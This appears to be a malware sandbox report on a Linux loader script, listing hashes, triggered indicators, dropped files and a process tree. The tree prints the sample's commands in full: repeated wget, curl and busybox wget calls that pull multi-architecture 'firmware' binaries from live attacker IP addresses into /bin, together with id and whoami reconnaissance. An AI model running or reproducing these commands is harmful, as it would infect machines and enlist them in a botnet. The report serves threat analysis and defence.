287f6f603d7d1dc024d5b9ac30ef646820eb2ac68f2d864304fb6f0e01456258

Analysis

max time kernel
118s
max time network
122s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
08/09/2024, 15:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

142a76be1c69df84d601addd0aacecb0N
Size

7KB
MD5

142a76be1c69df84d601addd0aacecb0
SHA1

e5c0c1b5828427f77bda0a8f278463f6d82f843b
SHA256

287f6f603d7d1dc024d5b9ac30ef646820eb2ac68f2d864304fb6f0e01456258
SHA512

1c81ac978ab32ed5364a50ffee433f044f86959bce0b8fef36efcb92095d182ef58427856a64547d98190603d900b373f5831009a954f3ec96799b55c1d52c3f
SSDEEP

48:R78A4wEkFblp1rNmFgSPm0f3N1JfqNgPu5AlfqK6/Eg83QNqfk5eLe67vXyEgZ9R:RE+blpRHarojP

Score

6^/10

discovery

Malware Config

Signatures

Writes file to system bin folder 20 IoCs

description	ioc	Process
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	142a76be1c69df84d601addd0aacecb0N
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/current_user2	142a76be1c69df84d601addd0aacecb0N
File opened for modification	/bin/firmware_v4?user=root&dir=%2Fbin	wget
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/ALLAH_IS_EVIL.txt	142a76be1c69df84d601addd0aacecb0N
File opened for modification	/bin/allah_is_satan	142a76be1c69df84d601addd0aacecb0N
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	wget
File opened for modification	/bin/itriw	wget

Reads runtime system information 3 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/sys/kernel/ngroups_max	id
File opened for reading	/proc/filesystems	id

/tmp/142a76be1c69df84d601addd0aacecb0N
/tmp/142a76be1c69df84d601addd0aacecb0N
1⤵
- Writes file to system bin folder
PID:1497
- /usr/bin/id
  id
  2⤵
  - Reads runtime system information
  PID:1499
- /bin/sed
  sed -n "s/^uid=[0-9]\\+(\\([^)]\\+\\)).*/\\1/p"
  2⤵
  - Reads runtime system information
  PID:1500
- /usr/bin/whoami
  whoami
  2⤵
  PID:1501
- /usr/bin/wget
  wget "http://45.152.112.46/firmware_v4?user=root&dir=/bin"
  2⤵
  - Writes file to system bin folder
  PID:1502
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.x86_64 -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1507
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv4l -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1515
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv5l -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1516
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv6l -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1517
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv7l -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1518
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i586 -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1519
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i686 -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1520
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.m68k -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1521
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.mips -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1522
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.mipsel -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1523
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.powerpc -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1526
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.sh4 -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1527
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.sparc -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1528
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1529
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.arc -O itriw
  2⤵
  - Writes file to system bin folder
  PID:1530
- /bin/rm
  rm ff0
  2⤵
  PID:1531
- /bin/rm
  rm ff1
  2⤵
  PID:1532
- /bin/rm
  rm ff2
  2⤵
  PID:1533
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.x86_64 -o itriw
  2⤵
  PID:1534
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv4l -o itriw
  2⤵
  PID:1535
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv5l -o itriw
  2⤵
  PID:1536
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv6l -o itriw
  2⤵
  PID:1537
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv7l -o itriw
  2⤵
  PID:1538
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.i586 -o itriw
  2⤵
  PID:1539
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.i686 -o itriw
  2⤵
  PID:1540
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.m68k -o itriw
  2⤵
  PID:1541
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.mips -o itriw
  2⤵
  PID:1542
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.mipsel -o itriw
  2⤵
  PID:1543
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.powerpc -o itriw
  2⤵
  PID:1544
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.sh4 -o itriw
  2⤵
  PID:1545
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.sparc -o itriw
  2⤵
  PID:1546
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -o itriw
  2⤵
  PID:1547
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.arc -o itriw
  2⤵
  PID:1548
- /bin/rm
  rm ff0
  2⤵
  PID:1549
- /bin/rm
  rm ff1
  2⤵
  PID:1550
- /bin/rm
  rm ff2
  2⤵
  PID:1551
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.x86_64 -O itriw
  2⤵
  PID:1552
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv4l -O itriw
  2⤵
  PID:1553
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv5l -O itriw
  2⤵
  PID:1554
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv6l -O itriw
  2⤵
  PID:1555

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/ALLAH_IS_EVIL.txt

Filesize
828B

MD5
654d89fdcfd44330b80fc359d544adb9

SHA1
53ff7c283c7bab6b7071510349b7785e54da5454

SHA256
43a54d24621ffaa1dea049234cc1296ec4f1a8285c4c90254202329d9762ca75

SHA512
d3e32c72576fea7cb0d30957818c8ee61fa951fd7ff59a6fb462b53fe44559cf9eb501e9dad03d05703b4d6b33854ee062a3ba6ef940c46d7fef92a5c278d857

Download Submit
/bin/allah_is_satan

Filesize
15B

MD5
640832e65d903e762b84b766ea39ed8e

SHA1
a35a203fbae4b913edbd5f00cfc92fe076e39532

SHA256
68bf38c7874a4b54ed0dcc53ee8c55194ad2437818a577364a5735a56a819c2b

SHA512
f22f27d22110c3ec9f95a84617dbe49d4d59295bce184c31ceac5b5cffed1494107b25d48d1ecedab7c0a2d8ef377e7008732950fee903269c1d1fbdb126449b

Download Submit
/bin/current_user2

Filesize
5B

MD5
74cc1c60799e0a786ac7094b532f01b1

SHA1
552c0ba71b1046a083583ebf943cc9aa09f39a32

SHA256
53175bcc0524f37b47062fafdda28e3f8eb91d519ca0a184ca71bbebe72f969a

SHA512
21e1bc024bd76c76b68e04614c6def5b03fd4b658e59bfde065b464b520f463711b795455e3a5c81a8a1946b2bca2f83d6c19300a4d3326ce17959a7cbc0846a

Download Submit
/bin/firmware_v4?user=root&dir=%2Fbin

Filesize
4B

MD5
2a76ee31e49f38759ed046466b52a513

SHA1
e31dcb09b650cd3ab532a902888c33da96f45c55

SHA256
7ca1e25edd006f00775c737c9f1062a685ce2f897ceb52ce6a2bad7292257c1f

SHA512
e9c4932f7cd5ec940b1de3a82fa19dfc17f19e1eb7c8ef2ed435e637d0a5170d0ef0a5fad37f9092290e9e6bc1b6cea37c45b98a099426264720d57cfa5e93a9

Download Submit
/bin/itriw

Filesize
6B

MD5
e774abc405e32339fbb53305c3dbd21b

SHA1
789181fc8bb5030d068a660cb7d8227e400ec1ba

SHA256
1f9ef5d950b9e3ceeba9dfd14e23b59d7053cc83a8d56e9f08ac8baf1c8a4a1f

SHA512
9b4f93292eada8cd0c8173d040b2959b99fc8f49af62f2f3b03fb38b5ef0cb5a64643847744629070511a0faa1a2022cf12f2003fbfc97762e498b4b03a626c5

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads